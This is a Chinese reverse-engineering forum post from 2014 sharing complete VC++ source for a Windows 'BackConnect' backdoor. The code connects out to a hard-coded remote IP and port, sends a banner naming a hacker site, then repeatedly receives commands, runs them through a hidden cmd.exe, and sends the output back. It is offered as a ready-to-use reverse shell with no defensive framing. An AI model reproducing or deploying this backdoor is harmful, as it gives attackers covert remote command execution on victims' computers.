滴水逆向联盟

标题: vc++反向连接后门 [打印本页]

作者: 大灰狼    时间: 2014-7-25 09:11
标题: vc++反向连接后门

  1. #include<winsock2.h>
  2. #include<stdio.h>
  3. #pragma comment(lib,"ws2_32.lib")
  4. void main(int argc,char **argv)
  5. {
  6. char *messages = "/r/n======================== BackConnect BackDoor V0.1 ========================/r/n========= Welcome toHttp://www.hackerxfiles.net =========/r/n";
  7. WSADATA WSAData;
  8. SOCKET sock;
  9. SOCKADDR_IN addr_in;
  10. char buf1[1024];   //作为socket接收数据的缓冲区
  11. memset(buf1,0,1024);   //清空缓冲区

  12. if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
  13.    {
  14.      printf("WSAStartup error.Error:d/n",WSAGetLastError());
  15.      return;
  16.    }
  17.    addr_in.sin_family=AF_INET;
  18.    addr_in.sin_port=htons(80);  //反向连接的远端主机端口
  19.    addr_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");  //远端IP
  20.    
  21.    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
  22.    {
  23.      printf("Socket failed.Error:d/n",WSAGetLastError());
  24.      return;
  25.    }
  26.    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)     //连接客户主机
  27.    {
  28.      printf("Connect failed.Error:d",WSAGetLastError());
  29.      return;
  30.    }
  31.    
  32.    if (send(sock,messages,strlen(messages),0)==SOCKET_ERROR)  //发送欢迎信息
  33.    {
  34.         printf("Send failed.Error:d/n",WSAGetLastError());
  35.         return;
  36.    }
  37.    
  38. char buffer[2048] = {0};//管道输出的数据

  39. for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline))){
  40. SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
  41. HANDLE hRead,hWrite;
  42. sa.nLength = sizeof(SECURITY_ATTRIBUTES);
  43. sa.lpSecurityDescriptor = NULL;
  44. sa.bInheritHandle = TRUE;
  45. if (!CreatePipe(&hRead,&hWrite,&sa,0))
  46. {
  47.   printf("Error On CreatePipe()");
  48.      return;
  49. }

  50. STARTUPINFO si;
  51. PROCESS_INFORMATION pi;
  52. si.cb = sizeof(STARTUPINFO);
  53. GetStartupInfo(&si);
  54. si.hStdError = hWrite;
  55. si.hStdOutput = hWrite;
  56. si.wShowWindow = SW_HIDE;
  57. si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
  58. GetSystemDirectory(cmdline,MAX_PATH+1);
  59. strcat(cmdline,"//cmd.exe /c");

  60. int   len=recv(sock,buf1,1024,NULL);
  61. if(len==SOCKET_ERROR)exit(0); //如果客户端断开连接,则自动退出程序
  62. if(len<=1){send(sock,"error/n",sizeof("error/n"),0);continue;}

  63. strncat(cmdline,buf1,strlen(buf1)); //把命令参数复制到cmdline
  64. if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
  65. {
  66. send(sock,"Error command/n",sizeof("Error command/n"),0);
  67. continue;
  68. }
  69.   
  70. CloseHandle(hWrite);
  71. //循环读取管道中数据并发送,直到管道中没有数据为止
  72. for(DWORD bytesRead;ReadFile(hRead,buffer,2048,&bytesRead,NULL);memset(buffer,0,2048)){  
  73. send(sock,buffer,strlen(buffer),0);
  74. }

  75.    }
  76. }
复制代码







欢迎光临 滴水逆向联盟 (http://dtdebug.com/) Powered by Discuz! X3.2